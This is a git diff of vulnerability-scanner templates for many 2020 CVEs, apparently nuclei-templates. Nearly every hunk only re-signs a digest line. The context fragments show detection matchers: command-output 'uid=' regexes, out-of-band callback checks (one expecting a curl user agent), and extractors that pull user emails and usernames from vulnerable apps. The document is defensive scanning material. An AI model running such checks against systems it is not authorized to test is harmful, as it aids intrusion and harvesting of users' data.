490a00463044022067a92ac8b7c22a4e10a1ee56656b6be594ea35020ea4799e5af8d2eef94cbbb102204d477f10be4ca3adbda2c9b72bb5526b256b068fcfe7e18923bea002242295d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022062e1de2b70b56720e833b1f4fb60be1f04725c5346d1b69a78e08535f21f7202022001fd3012f4f4ece788b994cccc812dda2d92160038e808f9b9bed1573ed4954b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index 6025551523..e1ff6900d9 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -42,4 +42,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4b0a00483046022100b445b86b8bc851dfc73d48b1385c99d7ad711230fa56e43efd02d7755d29ea84022100bfc90c7ba695df767a9f32c5eb3a29bf895e0af68b1d4c163438eaf8bfc221b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a2f8e688066f0bf78b4ec30e42371cdcfbd6163f995127448631eb8c36f8da5f02201b8d6b4e4092a47507ca2b42459fcf3da8d0bc221c89e8c70b605abe10f18379:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index 137f120d57..b01d16360b 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -44,4 +44,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4a0a004730450221009e55b332e27a60cf87cccd81422880062f90e44d254777bb1ec7f9140fa0054502205fddccf82cfe56707866b8766e8b74347aef1bf754927ccb40079bb273c5b359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022059525c62ce6e84a6139fb32be4e0ac407b3214a0a55d0c92455379d33a54676f022100845435da58a71d7dff6dc5ef5c2318d7d51e38ac98d2eb90a62aca375f4a526b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index 71d65d54bc..bd4d0224a3 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -42,4 +42,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4a0a00473045022100871fd309f948d3202f0de9e37571c921c7c90656777d3fd15ab38733ad2408c102204f62211c931f9e30ab1ff0bf20bb503191ed0af758f8fe2b0373f48ec8bcd315:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100936088574c536f79ad97ead1e884e8e6f07631923462c9e2816709d350c2219c02206ee0d19db59a932db37e1174fef33662049d86f69dbf60116cd52c7fbedeb0a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index ac7a1d257c..b50cb137d1 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -42,4 +42,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 490a00463044022071b6a405d90f0054834aa1c5c3703f7bcb45b4f903a6bc652d448f4538db822a02200b1db00826ae2aff686f2d3c41ac214901596ef82ccf7dd22d40e04364765372:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220526bec7134f0a7e30dc2c18d05cd0a15c7236eea798996f61b0a30b2f25679b7022100c0d2a8f60b929351c19fe62be4957ce929b27253d7af1d2a301e46949e00d646:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index db201321a1..667627c361 100644 --- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' -# digest: 4a0a00473045022100ae77234850dda3e92b7d3c070dd3f65e32ec805f1ebe87e6bf894a33e0bcee1802201e520db0d31b87bd98524bf3edc556e65db0ce4929df90d482ddf582fe4457b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a7692af826a553f554b1aaae243cbb0f1735a12d9a2be7930ebce8071d514ae802203ad5938318568124585ab423e3afa8746c3a5089d34d4f16d6e4f996993fa80d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index 90a5e336be..96381db450 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b35fbfad637dec46e02dd52e3937c9a7946b832a92b5a742cda3d4a51e77d0ec02207e01bdf1cc3c1558864bc97d6685f1c982f8ecf5c977021caae8a5c017963601:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202b879dfcedefeec8e77a0f23607f84fd9daf70f6481881e65fe17a2ef8267e1902201dacbd3ac31b08a3eb15d8242e03d93927d46b1f5c6037be98c80050ae678a47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml index b7b83f77e9..fff904bdb6 100644 --- a/http/cves/2020/CVE-2020-23575.yaml +++ b/http/cves/2020/CVE-2020-23575.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205f12eef681cfdc5b25284c5454a90ded2df8a57c3ce88dc0b02c875889c55b3d022024a97cc9f5593bc334188272f41626107d090fd8b46cc923f55db4fecd61205f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100abbf63b9229ba0217fe85b757de401441110be4df4db05558bfba4e8c8bc299f022023b4dd6e7711546f8028881e69d2dede18db1489ae303dfde57ca2749a90f14a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index 21cd1ee210..7f021b9aed 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml @@ -71,4 +71,4 @@ http: - 'id="csrf" name="csrf" value="(.*)">' internal: true part: body -# digest: 490a004630440220388c291d21538ae9468cbf1003d57432e845e76f6e5ca57401c295990dbfa3c802201e068fb257170a9fd9eb666b68ebba98a088c87a3f79ab04d71631a4170816d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cae69f96e8d3f848fcc91d7f13fa209d1a7474e8ef0d0eb2205d8fdcd457c439022100ed3001e46464cdeeeb3500372afe02eb3c6ae9c3554c163cea11ac1b119eafd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index 5c30f563dd..182530cf77 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -56,4 +56,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a004730450221008907b33fa8964132104119ef61c647b4ac492fb6758e4d425a2e2e06c366b968022006bc6c08457da183de8a277b67987bfcd2c316abba26adfeb9d24a31aed2b689:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206438adc9577bc1983c31950c82e68017eb54d222a07044e640696033b2b55cec0220306848d8e0c13a7fa6d8aaffd80dc5af414a779526851ec95fe9325e7c6720a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index a11fbbd5a2..ed664c5685 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml @@ -97,4 +97,4 @@ http: regex: - '"url":"([a-z:\\/0-9-.]+)"' part: body -# digest: 4b0a00483046022100e38932a4bbaeb966d0ff133b826f339af5d5ced828fa938d65afd4ca069940b602210086ec11b8bf600caea0125a35dd2eab8c0843a0335c30b73c7a29838c73c03bca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022072ed0f4b5782100ff0dee8c88d2f3d5fe97194113652c1db44b0c64922842561022100929951c15416da76ada640267baafb313d4fde4abed2bdfc1e9783b5f6d0a279:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml index cf1285a2b9..bf2895a6d1 100644 --- a/http/cves/2020/CVE-2020-24312.yaml +++ b/http/cves/2020/CVE-2020-24312.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220457039ce0d9472c9c7f31b2390ffa8f660ae48086aaac7e0cbc18f819873abc502206ba999750bee55d9e2bf5bda1c630a0706596ba612b1c1c330e5e33e913b46ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c98c927aeafcbd1a6adf21b5d21faf57aab5c79a2a58d2cdfec24bf064a1c9d022072cd720a6236cc17b4aeb69b4aeeb9ad1a5fa0285b4f437055d27674847d55c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml index a6fc48b68f..f3e5ef970a 100644 --- a/http/cves/2020/CVE-2020-24391.yaml +++ b/http/cves/2020/CVE-2020-24391.yaml @@ -62,4 +62,4 @@ http: - type: regex regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" -# digest: 4a0a0047304502200b7220be48731b335cab21f60260aa54175107f3ff242575a13060dbca77c791022100ef30764fd9c95d17d3e63194c798c924ddbff9e0b7835808965f3d535a3b783e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022071a22b59e3348ed8ba27141f47e9ae1bca53e0c6e6d939df8dce5209486e0f4002207ebb1c95c7da917ab83f9a3b538bd350070a303f44794d0f3076369ef950755e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24579.yaml b/http/cves/2020/CVE-2020-24579.yaml index 7e7da2b9eb..9a9e6f1656 100644 --- a/http/cves/2020/CVE-2020-24579.yaml +++ b/http/cves/2020/CVE-2020-24579.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220066bfa74b2f1b728ce53f16ab6639e0ff98246333be3a0ad3fe83f7c64c33bb6022100eaac438fe3d62f74001b2af20f8088179ba40ea0e089b87468ccea9a4689a3d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d0dad0d3f149ea75ab9ebf58b63e74ae1eea82f25ab618bf8ac84db06cb010da0221008f5aecf038a76df56a89d047b1fc34d347b314b4608b213a037a8149cc68d981:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml index 59d9e17037..b471b0e998 100644 --- a/http/cves/2020/CVE-2020-24589.yaml +++ b/http/cves/2020/CVE-2020-24589.yaml @@ -51,4 +51,4 @@ http: part: body words: - "Failed to install the generic artifact type" -# digest: 4b0a0048304602210090a4585860b08882e0a74df9f647083b80f77dac5ad0dd1b23edda572fabe9f7022100bd4d26f2655c26e67675437452a7565ec16e27eaeb99d4cd108cc9101d9dfc3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a46002c04b61e32de82a96a52b9b729882e74fa21aaaea3fc4c33bac965f7897022010b04d7670233afd72f3ee1137579adc1b40f09a0b771f769deba4e19d5069e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24701.yaml b/http/cves/2020/CVE-2020-24701.yaml index 8ac6e19024..213473fe25 100644 --- a/http/cves/2020/CVE-2020-24701.yaml +++ b/http/cves/2020/CVE-2020-24701.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a2cdebb20e18eaa890cfc50613c3066fe88508ab4895439e1e93c3be8538e21e0221009989389686769e0e936f56b8d0c418beb0c14d427c1d13f1eb05dbd4f49ffacc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fbd977612352f0dbc57fc3116dd0173e5956ea43743ff80cbff7b4741e2b7410022100aea4f9ac38a84e79ec13760d398472a7d7b2d5a7534700d083a56e89868373a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index fe24e7e56c..99a4d2cb28 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cc3315a626f72938e1bbd0b8d6123c0a4e45d1f6f608ec22fc41d9b038f25b6d022045f6709f3c37e878675f5ea3caf6f393801ac2d1c850932a039abd8066a934a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202c73f9c7d042051620e75c32001daf5e2ff74b05bddc153e04181ff239e33ec3022100dc7cb39e3db47baf79e6dee1450892b325dafc661450aaa1cda60304a42ed88c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index ce62d05cfc..9292fceb45 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008dc31b494c720948586f64df0d6c82addb71bac56f1d7b99d5b94d7c7d698c20022100fdc628af73a6fc813bb7c98900e81ba79c49b4eeafc5fe53895b55f7c2cfb055:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207738b2066386fd459e0b9ac89d7d2e288a4e34648fb01f90ec71c0e21fa03ae50220175ca7faf47c6e694fd4e185116169a7ef825b5cef23676ab7b5d04d228a5bfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index 308f2afbe1..f47abe96cb 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml @@ -52,4 +52,4 @@ http: part: header words: - 'Content-Type: text/html' -# digest: 4a0a00473045022100a91523e9be74d0fdb90d90a1c3d215030746d376affcf30c8322918bde098fce0220595f4f0288fb85dad8ad6bc73fc2da9fb28c78ed25c2efe66c9d8fdafef1f1a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201284fc9743bbc71a2debc287e5b7df8dd6c308b45e77fae4f747b7b6898bb91202204e779ee77aab819050cc1bb71ab2186a94731f6917e8dc308a48919697259d0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index 9a0e51e49b..68a90dcc0a 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -79,4 +79,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009764a3380b69d4ec8408e92d8ba889960fbf555098f4ec27add5b2b49a5a6f0e022100edd60e97f49ac3c83ab4d31e41a127aec179ded13d84394542e9ec386121fb1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f81ace544937588a6d8d8eb3e27477753548e12b0bc8be2225c631fbe79db914022100f85f3adefb3718f509c523fb5addf2ed503818ce0bd802055f6c5ae9469ab7d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml index 03e13e70b3..e352869ebc 100644 --- a/http/cves/2020/CVE-2020-25223.yaml +++ b/http/cves/2020/CVE-2020-25223.yaml @@ -57,4 +57,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a0047304502205dc1664f5c457024a05322ea4f90f1b555fa287fa88d891fdd22ab9f01254c6f022100a2775475c594fb68dc732630b5d0861715e7d2b5e50722a65a2206ffcd920929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ff6dc32d4259c76f602a5881b869f0b86187c42a75caee8ef34b68e8dc28d74502200812acfb06dd5d961a892bf16f306744b40f7ce367eb835878d8a37e2fa15322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25506.yaml b/http/cves/2020/CVE-2020-25506.yaml index 3fc5fbcc3a..77f558a5c4 100644 --- a/http/cves/2020/CVE-2020-25506.yaml +++ b/http/cves/2020/CVE-2020-25506.yaml @@ -57,4 +57,4 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" -# digest: 4a0a004730450221008603407556f5d86d00fc35eb29d8dfabfafad112a165be5c7341165845aac25802204d9d3505889d5f2e6e0aaf6df6add1895a70a6f9ebfed6e2022cb1654f9e342f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210087f9fda321acac1cfec59ea26884ff17883f6578cbb15be1a787358a943732730220051d4c4fafdee0ca2c78245e67b43a6e72988d334ddb685ca84234247fcccabc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index d64fd22ac7..23966e9388 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202870c3b1ea333869c202cd0988502ae3b1582d4b38ce1c7db483240b803ea92502203c70ee8d4e58c93bdeb345eff7fe2b91ff4f7d767a012e2b2ff738febbddedf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205f8386f0894e4a5ed95d7986f6cfe22d73d8063ee2647f707f665bdbc0f9b5c20220373711b803f101999dbe22a26091260e8aa0b2892867bbd121f8ed6978870310:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml index 0a03ff33ee..e886e4a34f 100644 --- a/http/cves/2020/CVE-2020-25540.yaml +++ b/http/cves/2020/CVE-2020-25540.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220351956c4076b5c945da78c1f7ca4b062470b1039145c21aafaaccaea5044b9db02207d554851aec1c74cc8061be5f627d90b05ec7fa28a738c86a1f391b4acf10174:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204bef32526e90ddb09bb57c38b3fd11b608648a32f697c09f154728de2541a52f022031088ea83937b704239ee7fed67a51682e1b3cb2234bbf87f70387d158232753:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index 85a7fc395f..a5a9588d28 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bbb346c3a43f73c414eb6ed526792050eb465a32f0a28251cad292479212181c02206d6bd66c126ad94302fd362178e914dd5d99e7af5cec7deffc553e0699899b9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b44c39650dba7c75daabe2fee077ff2200be79fb1c7c6f2760278e18f47dc9bc0220400c4592332407f486b4644593b48f553d65fefdf4c8d7799022d86410b88079:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26214.yaml b/http/cves/2020/CVE-2020-26214.yaml index 31d70be1ec..c8ec4682f2 100644 --- a/http/cves/2020/CVE-2020-26214.yaml +++ b/http/cves/2020/CVE-2020-26214.yaml @@ -64,4 +64,4 @@ http: group: 1 regex: - '"name": "Alerta ([0-9.]+)"' -# digest: 4a0a00473045022100e204bd9385cf6b58f653e6b232edefbe1ce420d88afa77870717ebc626d8a2ea022067167ad2a0440c6d8e17db9ad35d149a90e5b289ee02d11bcaf428a2b3af61cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022008374afd557adb127cd15e5de841792bb7ef8536cbf125283d8d8fb6c6a1b130022100e6a881e33555c33a5ba0ad64486315f3cef48f4c7cedb12d0c887dab8246861c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26217.yaml b/http/cves/2020/CVE-2020-26217.yaml index a9b1045b02..3356ddb5bf 100644 --- a/http/cves/2020/CVE-2020-26217.yaml +++ b/http/cves/2020/CVE-2020-26217.yaml @@ -101,4 +101,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4b0a00483046022100833148b184c9a024daabe14d4fef1a74835dd8f418140ce52d04df763175d9e8022100f65031aa40e1c23f6150f38f0f8737a2ac23a8e5c5f4cc29f48a0de92a01de3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100be9faf87543a83616237ad88cc863a1635a1425a953e40de96c995ba626e966c02205aef01716e33bbe562f462643400f53526a145d1aed3fbf0d6f9d0f8b640e9c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index c9e41d9290..ed03d23a82 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -64,4 +64,4 @@ http: json: - '.data.users.edges[].node.email' part: body -# digest: 490a0046304402207563b8edc19efc3cc19d14fdb717c94e8c29de7443af2fdb01addacf38917ef7022035b462d59175b05bc03b8666aa7cab3aebb000b9c0e22dec14d0dc05b0dfe876:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202e5b9157d7ae60c22f988cf39b691c717b7eb7bc093f14ac0bed7f55162ca0e1022100dd57ee313da7fcab09f97bc272e9b114cce21448f38a7d5e5db130e3df7b1c69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml index fcac697eaa..a4b5ee0637 100644 --- a/http/cves/2020/CVE-2020-26948.yaml +++ b/http/cves/2020/CVE-2020-26948.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100c5b4229b7c0844e8fcfb9bc1679051e3ac701c065fd3e5789469152a7df1ec21022100980de112b617f6c799be1d61a0dd773d11dfc361c3d2bd02d98dae82ac6e8d47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220188b47530029da65c0cb5d784be49ec43adf43b570dd3393bb805a6c0247e42002204d833e981c82ee0b3f2cd4f6cbc6a03f072dc0a091250d4dc74817b28c8446a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index 1b2c984cbc..d56d379e32 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202fa8f3f605bced9c2bff8bd71dfd1b657c7806b31db0da37ba79f848736c0448022100b028c9c54f50d73729aa0630e94a3a90f88663ee769dae3762ef6b64d4da2dd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022053705e9ca543b6da6f715f98721e2301351adfd2835be7aea65337a604285e0d02206e6f0416654910b51302f1f90490a1f60cff9ede2ad03ef280746ac92e2298cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml index c3ff473896..ee8a0d7b4c 100644 --- a/http/cves/2020/CVE-2020-27467.yaml +++ b/http/cves/2020/CVE-2020-27467.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022005cc8cc6d259f90bddcc4ab74577e25407c52171a5893d763b5d5ab1dd6159c602204a99b859d07b48c2f47cf2a1a8329315e236c3999217ea353e49076587c74df0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206ed17b2d49ff9f65ce2c0e4da3dcc47bfb60f16e802588f87c2b5a373ce7c401022100b26845fa81b1cda894e0d93ede5da56f800e98f4783cfdbe5541056c8fea6ef1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index e311fbcca2..d697b3fbac 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -46,4 +46,4 @@ http: - "status_code == 200" - "contains(body, 'goodlayers-lms') || contains(body, 'goodlms')" condition: and -# digest: 4a0a00473045022100838e205274d6592ebebcc4ab9b689fd6d05ec245b61cb0f69cff831152ea32dd02203fc10829d7d36c26e62df66914a28f76aea1fb34c5f7162abe66805dbf74f212:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100de8e68d9f94b82af184c4830778f5a38d929abe4ad7c1b9a60ab64389a0adf0102200abfa6c9701dce38f221abae9f7130bf100efa9f0c5232356ad4a034340561b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27838.yaml b/http/cves/2020/CVE-2020-27838.yaml index 69fb387790..2e5af92475 100644 --- a/http/cves/2020/CVE-2020-27838.yaml +++ b/http/cves/2020/CVE-2020-27838.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e340099dadc3710a63b8cc3e0182b0c1a738f7480c069fa5c39913092f31b39802201ad2dbae637d451dd3a442b8c8a7d2f0d5244240545b98ba4431a62241c66fa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207895664fdebc5404ce9b5e8146b8dd8f79fea659ab11352290da20fb6d1072500221008a648ae8987c5477eb6f059f6f17812e94cca5d74f45fe63e21768958c8304b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27866.yaml b/http/cves/2020/CVE-2020-27866.yaml index b8714487f4..c410fc5139 100644 --- a/http/cves/2020/CVE-2020-27866.yaml +++ b/http/cves/2020/CVE-2020-27866.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206614a114a0e46ccd3935e0a85a4ce47db02ad69127536ba5caaf39e4b766fd7b022100e8ec849c63835f81173d35f82f959e45539cb809a531d887b39b8e4880829958:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204ac39771de2484f18af059ca50ec2d4e00b27c1e116ec99ff98d059d208d7d7202207cc24efe15ea5aef6f8263ff50ebc9d661725d0385531fe59b2d5d4b67af3f52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index a331f1c2fb..956b55feb9 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022021228856359476fd6a2d98aa76d72aecb684490df2490020087fe9acc00d15bc022100d44cd28e5f19364d83758d6ab7063cd8cc4b7512064a93b92f336fbfc44e35af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206bc085b42213b6080bcef49883d25766126822c2a961ff6399087b5325444dc5022100dc09c27ceb99097599ebc2efd75d6c5ab32d9445473235d7866558648db6acc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml index d537647c4d..7ed869adf8 100644 --- a/http/cves/2020/CVE-2020-27986.yaml +++ b/http/cves/2020/CVE-2020-27986.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022018dd73d96bac6da6fc47257dd5f2f32f35765baeeb0e50c617927f961d1ed43f02204921a13c37cf71890f34425dae58ae03f36c8aec68a45141cbd931b4edc23cec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb7f58cb5673f8053ed5ad66af0605d5d46519262e62342506a7219274f0a748022100b4f6625f370ff8dbc8c5b0437ec95cee595bda01458944bcc7c1985cae793bb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index bea963d0ad..84fc04f8c8 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -66,4 +66,4 @@ http: regex: - '"username":"(.*?)"' - '"email":"(.*?)"' -# digest: 